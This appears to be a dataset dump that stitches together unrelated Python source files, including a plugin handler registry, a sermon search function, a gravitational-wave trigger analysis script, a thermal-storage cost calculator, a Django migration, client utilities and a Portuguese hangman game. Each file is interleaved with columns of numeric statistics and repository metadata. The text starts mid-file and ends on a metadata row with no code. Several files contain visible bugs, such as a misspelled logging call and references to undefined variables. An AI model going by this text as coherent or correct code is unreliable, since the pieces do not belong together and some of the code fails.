+ m, 'energenie.Handlers') except: logging.exeption("Module import failed: " + m) continue for name, obj in inspect.getmembers(module): try: if not inspect.isclass(obj): continue if not issubclass(obj, Handler): continue if name == "Handler": continue plugin = getattr(module, name) if name in self.handlers.keys(): logging.debug("Plugin already registered %s" % name) continue self.handlers[name] = plugin logging.info("Plugin loaded \"%s\"" % name) except: logging.exception("Plugin failed to load: \"%s\"" % name) def __getitem__(self, k): return self.handlers[k] class HandlerRegistry: __single = None @classmethod def singleton(cls): if cls.__single is None: cls.__single = cls() return cls.__single @classmethod def alarm(cls, device, key, value, alarm_reason): cls.singleton()._alarm(device, key, value, alarm_reason) @classmethod def handle_reading(cls, device, key, value): cls.singleton()._handle_reading(device, key, value) @classmethod def device_detected(cls, device): cls.singleton()._device_detected(device) @classmethod def device_removed(cls, device): cls.singleton()._device_removed(device) @classmethod def handle_unknown(cls, address, message): cls.singleton()._handle_unknown(address, message) @classmethod def device_added(cls, device): cls.singleton()._device_added(device) def __init__(self): # Load settings from config self.__handler_factory = HandlerFactory.singleton() handlers = Config.singleton()['handlers'] self._handlers = {} for (name, handler_args) in handlers.items(): if handler_args.get('enabled') is not True: continue try: handler = self.__handler_factory[handler_args['type']](**handler_args) except: logging.exception("Failed to initialise handler of type %s" % handler_args['type']) return logging.debug("Adding handler: " + name) self._handlers[name] = handler def save(self): """ Set config handlers to new settings """ serialised = {name: handler.serialise() for (name, handler) in self._handlers.keys()} Config.singleton()['handlers'] = serialised def 
list(self): return list(self._handlers.keys()) def add(self, **kw_args): handler = self.__handler_factory[kw_args['type']](**kw_args) self._handlers[kw_args['name']] = handler def remove(self, name): handler = self._handlers[name] del self._handlers[name] handler.destroy() def get(self, name): return self._handlers[name] def _device_detected(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_detected(device) def _device_removed(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_removed(device) def _device_added(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_added(device) def _handle_unknown(self, address, message): for handler in self._handlers.values(): if handler.enabled is False: continue handler.handle_unknown(address, message) def _handle_reading(self, device, key, value): for handler in self._handlers.values(): if handler.enabled is False: continue handler.handle_reading(device, key, value) def _alarm(self, device, key, value, alarm_reason): for handler in self._handlers.values(): if handler.enabled is False: continue handler.alarm(device, key, value, alarm_reason) def ask(self): for handler in self._handlers.values(): if handler.enabled is False: continue handler.ask(device, key, value, alarm_reason)
28.834862
99
0.579542
680
6,286
5.167647
0.161765
0.064883
0.047809
0.047809
0.371372
0.282869
0.246443
0.227092
0.206033
0.206033
0
0
0.318804
6,286
217
100
28.967742
0.820645
0.017022
0
0.369697
0
0
0.043105
0
0
0
0
0
0
1
0.218182
false
0.054545
0.036364
0.036364
0.357576
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
e56f721835eeb1c014f7eed61ff0b3aab278b97d
2,313
py
Python
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
1
2019-01-21T03:11:14.000Z
2019-01-21T03:11:14.000Z
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
29
2019-01-21T05:48:09.000Z
2022-03-11T23:45:01.000Z
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
null
null
null
# page designed for the search implementation, to be cleaned up in # the future! import src.models.models as ml import src.scripts.index as scripts from sqlalchemy import and_, or_ def search_master(query, author, book_bible, series): # naive search. check and rank the match as it # appears to relate to title. if not author and not book_bible and not series: res = ml.Sermons.query.filter(ml.Sermons.title.ilike("%"+query+"%")).all() elif author and book_bible and series: book_bible = ml.Books_Bible.query.get(book_bible) author = ml.Authors.query.get(author) series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(and_((and_((and_(ml.Sermons.book_bible == book_bible, \ ml.Sermons.author == author)), ml.Sermons.sermon_series == series)), \ ml.Sermons.title.ilike("%"+query+"%"))).all() elif author and book_bible: book_bible = ml.Books_Bible.query.get(book_bible) author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(and_(ml.Sermons.book_bible ==book_bible, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.author == author))).all() elif author and series: series = ml.Sermon_Series.query.get(series) author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(and_(ml.Sermons.sermon_series ==series, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.author == author))).all() elif series and book_bible: book_bible = ml.Books_Bible.query.get(book_bible) series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(and_(ml.Sermons.book_bible ==book_bible, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.sermon_series == series))).all() elif author: author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(ml.Sermons.author == author).all() elif series: series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(ml.Sermons.sermon_series == series).all() elif book_bible: b = ml.Books_Bible.query.get(book_bible) res = ml.Sermons.query.filter(ml.Sermons.book_bible == b).all() 
else: res = [] return res
38.55
93
0.651967
322
2,313
4.546584
0.164596
0.153689
0.065574
0.092896
0.756148
0.724044
0.724044
0.604508
0.547131
0.547131
0
0
0.206658
2,313
59
94
39.20339
0.79782
0.064419
0
0.418605
0
0
0.004632
0
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.116279
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5726f32898dbebcb3904086e7f5f0ccc32ada7c
14,414
py
Python
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
#!/usr/bin/python usage = """grand_tour.py [--options] gps gps gps...""" description="""a script that generates a pointed follow-up of possible auxiliary couplings, sweeping through a variety of windows and snr thresholds""" import numpy as np from laldetchar.idq import idq from laldetchar.idq import event import greedyCI as gci import matplotlib matplotlib.use("Agg") from matplotlib import pyplot as plt from optparse import OptionParser from ConfigParser import SafeConfigParser #================================================= def grand_tour(gps, trgs, trgtype, windows, conf=0.68, plot=False): """ a function that compute the grand tour statistics """ if trgtype == "kw": col = event.col_kw snrkey = 'signif' elif trgtype == "Omicron": col = event.col_snglBurst snrkey = 'snr' else: raise ValueError("do not understand trgtype=%s"%(trgtype)) figax = [] for win in windows: print "window=%.6f"%win ### downelect to only this window trgs = [ trg for trg in trgs if (trg[col['tcent']] >= gps-win) and (trg[col['tcent']] <= gps+win) ] Pvalue = np.infty Snr = None Dt = None Frq = None for snrThr in sorted(list(set([ trg[col[snrkey]] for trg in trgs ]))): ### iterate over all snrs present print "snrThr=%.6f"%snrThr ctrgs = [ trg for trg in trgs if trg[snrkey] >= snrThr ] n = len( ctrgs ) ### number of triggers r = 0.5*n/opts.window ### point estimate of the rate if n: dt = np.array([ctrgs[col['tcent']] for trg in ctrgs]) - gps arg = np.argmin(np.abs(dt)) snr = ctrgs[arg][col[snrkey]] frq = ctrgs[arg][col['fcent']] min_dt = dt[arg] absmin_dt = abs(min_dt) else: min_dt = win snr = None frq = None if r > 0: pvalue = 1 - np.exp(-r*2*absmin_dt) ### cumulative probability of observing min_dt <= observed min_dt | estimated rate, the factor of 2 comes from looking on either side of the specified gps time else: pvalue = 1 ### limit is not great here...need to add CI print "\n\tchannel=%s\n\t-> Ntrg=%d\n\t-> rate=%.9e Hz\n\t-> min_dt=%.9e sec\n\t-> pvalue=%.9e"%(chan, n, r, min_dt, 
pvalue) r_l, r_h = np.array( gci.poisson_bs(conf, n) ) * 0.5 / win pvalue_l = 1 - np.exp(-r_l*2*absmin_dt) pvalue_h = 1 - np.exp(-r_h*2*absmin_dt) print "\t-> %.5e confidence:\n\t\tlow rate =%.9e Hz\n\t\thigh rate=%.9e Hz\n\t\tlow pvalue =%.9e\n\t\thigh pvalue=%.9e"%(conf, r_l, r_h, pvalue_l, pvalue_h) if pvalue_h < Pvalue: pvalue = pvalue_h Snr = snr Dt = dt Frq = frq ### separate plot for each window ### xaxis : time (relative to gps) ### yaxis SNR ### color = pvalue (upper limit?) if plot: fig = plt.figure() ax = plt.subplot(1,1,1) figax.append( (fig, ax) ) ### plot all triggers # dts = np.array([ trg[col['tcent'] for trg in trgs ]) - gps # snrs = [ trg[col[snrkey]] for trg in trgs ] # frqs = [ trg[col['fcent']] for trg in trgs ] for trg in trgs: dt = trg[col['tcent']] - gps snr = trg[col[snrkey]] frq = trg[col['fcent']] color = snr_map( snr ) ax.plot( dt, frq, markerfacecolor=color, markeredgecolor='none', marker='o', linestyle='none', alpha=0.50, markersize=2 ) ax.set_xlabel( 'time relative to %.6f [sec]'%gps ) ax.set_ylabel( 'frequency [Hz]' ) if Dt: color = snr_map( Snr ) ax.plot( Dt, Frq, markerfacecolor='none', markeredgecolor=color, marker='o', linestyle='none', alpha=1.00, markersize=5 ) ax.text( Dt, Frq, '%.3e'%Pvalue, ha='left', va='center' ) ax.set_xlim(xmin=-win, xmax=win) ymax = 1 maxfrq = max( [ trg[col['fcent']] for trg in trgs ] ) while maxfrq > ymax: ymax *= 2 ax.set_ylim(ymin=0, ymax=ymax) return figax def snr_map( snr ): """ map snr into color """ return 'k' #================================================= parser = OptionParser(usage="", description=description) parser.add_option("-v", "--verbose", default=False, action="store_true") parser.add_option("", "--kwverbose", default=False, action="store_true", help="make the retrieve_kwtrigs() call verbose") parser.add_option("", "--Omicronverbose", dest="overbose", default=False, action="store_true", help="make the retrieve_OmicronTrigs() call verbose") parser.add_option("", 
"--OfflineOmicronverbose", dest="ooverbose", default=False, action="store_true", help="make the retrieve_OfflineOmicronTrigs() call verbose") parser.add_option("-c", "--config", default="config.ini", type="string") parser.add_option("-o", "--output-dir", default="./", type="string") opts, args = parser.parse_args() if not len(args): if opts.verbose: print "no gps times specified" import sys sys.exit(0) else: args = [float(arg) for arg in args] #================================================= config = SafeConfigParser() config.read(opts.config) conf = config.getfloat('general', 'conf') ifo = config.get('general', 'ifo') windows = sorted([float(l) for l in config.get('general','windows').split()], reverse=True) maxwindow = max(windows) #=========== kwgdsdir = config.get("kleinewelle", "gdsdir") kwbasename = config.get("kleinewelle", "basename") kwstride = config.getint("kleinewelle", "stride") kwchannels = config.get("kleinewelle", "channels").split() for chan in kwchannels: if not config.has_section(chan): raise ValueError("no section for channel=%s found in %s"%(chan, opts.config)) #=========== oogdsdir = config.get('OfflineOmicron', 'gdsdir') oochannels = config.get('OfflineOmicron', 'channels').split() for chan in oochannels: if not config.has_section(chan): raise ValueError('no section for channel=%s in %s'%(chan, opts.config)) #=========== ogdsdir = config.get('Omicron', 'gdsdir') ostride = config.getint('Omicron', 'stride') ochannels = config.get('Omicron', 'channels').split() for chan in ochannels: if not config.has_section(chan): raise ValueError('no section for channel=%s in %s'%(chan, opts.config)) if oochannels and ochannels: print "WARNING: you've specified both Omicron and OfflineOmicron channels. In the event of a conflict, the OfflineOmicron data will be preferred!" 
#================================================= for gps in args: if opts.verbose: print "gps : %.9f"%(gps) #============================================= # KW triggers #============================================= if kwchannels: ### go find triggers if opts.verbose: print "\tdiscoverying KW triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) kwtrgdict = idq.retrieve_kwtrigs(kwgdsdir, kwbasename, int(np.floor(gps-maxwindow)), 2*maxwindow+1, kwstride, verbose=opts.kwverbose) ### keep only the relevant channels if opts.verbose: print "\tdownselecting to only the following channels:" for chan in kwchannels: print "\t\t%s"%chan kwtrgdict.keep_channels(kwchannels) ### trim the edges kwtrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_kw['tcent']) ### ensure we have entries for all requested channels and downselect as needed if opts.verbose: print "\tdownselecting triggers:" for chan in kwchannels: if kwtrgdict.has_key(chan): ### apply windows, thresholds if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(kwtrgdict[chan])) signifmin = config.getfloat(chan, "signifmin") signifmax = config.getfloat(chan, "signifmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['signif']] >= signifmin) and (trg[event.col_kw['signif']] <= signifmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['fcent']] >= fmin) and (trg[event.col_kw['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['tstop']]-trg[event.col_kw['tstart']] >= durmin) and (trg[event.col_kw['tstop']]-trg[event.col_kw['tstart']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan kwtrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, 
len(kwtrgdict[chan])) else: kwtrgdict = event.trigdict() #============================================= # Omicron triggers #============================================= if ochannels: if opts.verbose: print "\tdiscovering Omicron triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) otrgdict = idq.retrieve_OmicronTrigs(ogdsdir, ifo, int(np.floor(gps-maxwindow)), 2*maxwindow+1, ostride, ochannels, verbose=opts.overbose) ### trim edges otrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_snglBurst['tcent']) ### downselect as needed if opts.verbose: print "\tdownselecting triggers" for chan in ochannels: if otrgdict.has_key(chan): if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(otrgdict[chan])) snrmin = config.getfloat(chan, "snrmin") snrmax = config.getfloat(chan, "snrmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['snr']] >= snrmin) and (trg[event.col_snglBurst['snr']] <= snrmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['fcent']] >= fmin) and (trg[event.col_snglBurst['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['duration']] >= durmin) and (trg[event.col_snglBurst['duration']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan otrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, len(otrgdict[chan])) else: otrgdict = event.trigdict() #============================================= # OfflineOmicron triggers #============================================= if oochannels: if opts.verbose: print "\tdiscovering OfflineOmicron triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) ootrgdict = idq.retrieve_OfflineOmicronTrigs(oogdsdir, ifo, 
int(np.floor(gps-opts.window)), 2*opts.window+1, channels=oochannels, verbose=opts.ooverbose) ### trim edges ootrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_snglBurst['tcent']) ### downselect as needed if opts.verbose: print "\tdownselecting triggers" for chan in oochannels: if ootrgdict.has_key(chan): if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(ootrgdict[chan])) snrmin = config.getfloat(chan, "snrmin") snrmax = config.getfloat(chan, "snrmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['snr']] >= snrmin) and (trg[event.col_snglBurst['snr']] <= snrmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['fcent']] >= fmin) and (trg[event.col_snglBurst['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['duration']] >= durmin) and (trg[event.col_snglBurst['duration']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan ootrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, len(ootrgdict[chan])) else: ootrgdict = event.trigdict() #============================================= # combine all trgdicts #============================================= trgdict = event.trigdict() ### add kw triggers trgdict.add( kwtrgdict ) ### add Omicron triggers trgdict.add( otrgdict ) ### add OfflineOmicron triggers trgdict.add( ootrgdict ) #============================================= # cluster triggers? 
#============================================= print "\n\n\tWARNING: you may want to cluster triggers!\n\n" #============================================= # generate statistics, plots #============================================= if opts.verbose: print "\tcomputing statistics, generating plots" for chan in kwchannels: grand_tour(gps, trgdict[chan][:], "kw", windows, conf=conf) for chan in list(set(ochannels+oochannels)): grand_tour(gps, trgdict[chan][:], "Omicron", windows, conf=conf)
39.275204
211
0.55349
1,677
14,414
4.707215
0.195587
0.025336
0.027869
0.043324
0.46643
0.385989
0.374462
0.357487
0.327591
0.299975
0
0.005275
0.263494
14,414
366
212
39.382514
0.73832
0.124948
0
0.277533
1
0.017621
0.184001
0.006123
0
0
0
0
0
0
null
null
0
0.039648
null
null
0.114537
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e575c012f08e5a8055664cc644ae83131842c8cb
2,142
py
Python
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
1
2018-08-16T14:34:23.000Z
2018-08-16T14:34:23.000Z
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
null
null
null
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
null
null
null
""" thermal storage """ from __future__ import division import pandas as pd from math import log __author__ = "Thuy-An Nguyen" __copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich" __credits__ = ["Thuy-An Nguyen", "Tim Vollrath", "Jimeno A. Fonseca"] __license__ = "MIT" __version__ = "0.1" __maintainer__ = "Daren Thomas" __email__ = "cea@arch.ethz.ch" __status__ = "Production" # investment and maintenance costs def calc_Cinv_storage(V_tank_m3, locator, config, technology_type): """ calculate the annualized investment cost of a thermal storage tank :param V_tank_m3: storage tank volume :type V_tank_m3: float :returns InvCa: """ if V_tank_m3 > 0: storage_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname="TES") storage_cost_data = storage_cost_data[storage_cost_data['code'] == technology_type] # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least # capacity for the corresponding technology from the database if V_tank_m3 < storage_cost_data.iloc[0]['cap_min']: V_tank_m3 = storage_cost_data[0]['cap_min'] storage_cost_data = storage_cost_data[ (storage_cost_data['cap_min'] <= V_tank_m3) & (storage_cost_data['cap_max'] > V_tank_m3)] Inv_a = storage_cost_data.iloc[0]['a'] Inv_b = storage_cost_data.iloc[0]['b'] Inv_c = storage_cost_data.iloc[0]['c'] Inv_d = storage_cost_data.iloc[0]['d'] Inv_e = storage_cost_data.iloc[0]['e'] Inv_IR = (storage_cost_data.iloc[0]['IR_%']) / 100 Inv_LT = storage_cost_data.iloc[0]['LT_yr'] Inv_OM = storage_cost_data.iloc[0]['O&M_%'] / 100 InvC = Inv_a + Inv_b * (V_tank_m3) ** Inv_c + (Inv_d + Inv_e * V_tank_m3) * log(V_tank_m3) Capex_a = InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1) Opex_fixed = Capex_a * Inv_OM # TODO: make sure the cost of heat pump is added else: Capex_a = 0 Opex_fixed = 0 return Capex_a, Opex_fixed
34.548387
117
0.668067
324
2,142
4
0.37037
0.152778
0.208333
0.131944
0.274691
0.147377
0.112654
0.112654
0.069444
0
0
0.023339
0.219888
2,142
61
118
35.114754
0.752244
0.19141
0
0
0
0
0.128175
0
0
0
0
0.016393
0
1
0.029412
false
0
0.088235
0
0.147059
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
e577e51b7533e7208a1d0b836b3eb5c9b542e2cf
275
py
Python
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
null
null
null
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
32
2019-01-09T07:52:32.000Z
2022-01-13T01:01:55.000Z
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
3
2019-01-03T12:05:53.000Z
2019-09-24T11:41:14.000Z
# Generated by Django 2.1.5 on 2019-01-22 11:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('articles', '0012_auto_20190122_0826'), ('articles', '0014_auto_20190121_1631'), ] operations = [ ]
18.333333
48
0.650909
33
275
5.242424
0.848485
0
0
0
0
0
0
0
0
0
0
0.221698
0.229091
275
14
49
19.642857
0.59434
0.163636
0
0
1
0
0.27193
0.201754
0
0
0
0
0
1
0
false
0
0.125
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e57e90edde840704d0ec943f37c0d9761a6a388d
2,289
py
Python
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
1
2017-07-25T14:05:16.000Z
2017-07-25T14:05:16.000Z
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
17
2018-06-25T01:43:48.000Z
2018-11-15T13:21:53.000Z
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
1
2020-05-11T09:07:08.000Z
2020-05-11T09:07:08.000Z
import json import logging from os import environ from os.path import basename, getsize, getmtime, splitext, exists import arrow from .settings import config def env_to_json(): """convert current env variables to json text.""" return json.dumps(dict(environ)) def get_default_run_name(): """try to get run name for jenkins job.""" run_name = 'Tests running on {}'.format(config['host']) return environ.get('JOB_NAME', run_name) def get_run_source(): """try to get run source link and name.""" name = 'Jenkins' if environ.get('JENKINS_HOME', None) else 'Build' link = environ.get('BUILD_URL', None) return link, name def get_object_id(object_url): """ 'http://.../api/run/123/' => 123""" url = object_url[:-1] return int(url[url.rindex('/') + 1:]) def get_run_url(run_obj): """ 'http://../api/runs/123/' => http://.../runs/123""" return run_obj['url'].replace('api/', '')[0:-1] def get_result_url(result_obj): """same logic to get result rul.""" return get_run_url(result_obj) def log_params(func): """decorator to debug a function params""" def wrapper(*args, **kwargs): logging.debug("{}(): args={}, kwargs={}".format(func.__name__, args, kwargs)) return func(*args, **kwargs) return wrapper def as_config(name, return_field=None): """decorator to save function result as config""" def wrapper(func): def _wrapper(*args, **kwargs): result = func(*args, **kwargs) config[name] = result return result[return_field] if return_field else result return _wrapper return wrapper def get_file_info(file_path): valid_file_types = ['.png', '.jpg', '.jpeg', '.bmp', '.gif', '.txt', '.log', '.csv'] if not exists(file_path): logging.error('File not found: {}'.format(file_path)) elif splitext(file_path)[1].lower() not in valid_file_types: logging.error('Invalid file type: {}'.format(splitext(file_path)[1])) elif getsize(file_path) == 0: logging.error('File is empty: {}'.format(file_path)) else: return {'name': basename(file_path), 'file_byte_size': getsize(file_path), 'file_created_time': 
str(arrow.get(getmtime(file_path)))}
27.25
88
0.63128
313
2,289
4.434505
0.325879
0.057637
0.011527
0.01585
0
0
0
0
0
0
0
0.010468
0.207077
2,289
83
89
27.578313
0.75427
0.13543
0
0.042553
0
0
0.113636
0
0
0
0
0
0
1
0.255319
false
0
0.12766
0
0.638298
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e580d01d3aa8a72e3c26bf42ef6e06a1887e8fa9
4,584
py
Python
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
1
2021-11-09T17:46:22.000Z
2021-11-09T17:46:22.000Z
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
null
null
null
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
2
2021-11-01T15:08:52.000Z
2021-11-01T16:19:53.000Z
import os def _verify_endgame(word, check_word_in_used_letters, num_lifes): word_only_alpha = [c.lower() for c in word if c.isalpha()] if check_word_in_used_letters == len(word_only_alpha): print('> Parabéns você venceu') return True if num_lifes == 0: print('> Acabaram suas chances') return True else: return False def _print_word_status(word, num_lifes, used_letters): if num_lifes == 6: print(' ______ ') print(' / | ') print(' | ') print(' | ') print(' | ') print(' | ') print(' ') elif num_lifes == 5: print(' ______ ') print(' / | ') print(' | O ') print(' | ') print(' | ') print(' | ') print(' ') elif num_lifes == 4: print(' ______ ') print(' / | ') print(' | O ') print(' | I ') print(' | I ') print(' | ') print(' ') elif num_lifes == 3: print(' ______ ') print(' / | ') print(' | O ') print(' | / I ') print(' | I ') print(' | ') print(' ') elif num_lifes == 2: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | ') print(' ') elif num_lifes == 1: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | / ') print(' ') elif num_lifes == 0: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | / \ ') print(' ') print('# Palavra secreta: ', end='') for i in word: if i in used_letters: print(f'{i}', end='') elif not i.isalpha(): print(f'{i}', end='') else: print(' _', end='') print('') print(f'# Você tem {num_lifes} chances') print('# Letras ja digitadas: ', end='') for i in used_letters: print(i, end=', ') print('\n') def _get_letter(used_letters): while True: last_letter = input('Digite uma letra: ').upper()[0] if last_letter in used_letters: print('> A letra já foi selecionada\n') elif not last_letter.isalpha(): print('> Caracter invalido\n') else: os.system('cls' if os.name == 'nt' else 'clear') return last_letter def play(word): # Function that has the logic of the game # Checks if the letter typed matches the word # And gives feedback to the player 
according to the result num_lifes = 6 used_letters = [] _print_word_status(word, num_lifes, used_letters) while True: flag_correct_letter_attempt = False check_word_in_used_letters = 0 last_letter = _get_letter(used_letters) used_letters.append(last_letter) for i in word: if i == last_letter: flag_correct_letter_attempt = True if i in used_letters: check_word_in_used_letters += 1 if not flag_correct_letter_attempt: num_lifes -= 1 print('> Você errou a letra') if _verify_endgame(word, check_word_in_used_letters, num_lifes): break _print_word_status(word, num_lifes, used_letters) _print_word_status(word, num_lifes, used_letters)
32.510638
78
0.378272
389
4,584
4.118252
0.246787
0.174782
0.131086
0.06367
0.458802
0.374532
0.348939
0.308989
0.268414
0.268414
0
0.005864
0.516361
4,584
140
79
32.742857
0.716734
0.030541
0
0.5625
0
0
0.349324
0
0
0
0
0
0
1
0.035714
false
0
0.008929
0
0.080357
0.598214
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
e5911b5f19f89ac5924d1aa8f1aebc4e4604c187
57
py
Python
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
__version__ = "1.6.3" __author__ = "Jean-Sebastien Dieu"
19
34
0.719298
8
57
4.125
1
0
0
0
0
0
0
0
0
0
0
0.06
0.122807
57
2
35
28.5
0.6
0
0
0
0
0
0.421053
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5b8e22d994c4f8741461972d6a0873b7bd9c9db
9,962
py
Python
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
15
2018-04-26T07:39:29.000Z
2020-07-05T03:14:19.000Z
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
21
2017-08-04T19:21:09.000Z
2020-08-06T21:08:12.000Z
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
4
2018-04-26T07:26:00.000Z
2018-06-28T13:27:52.000Z
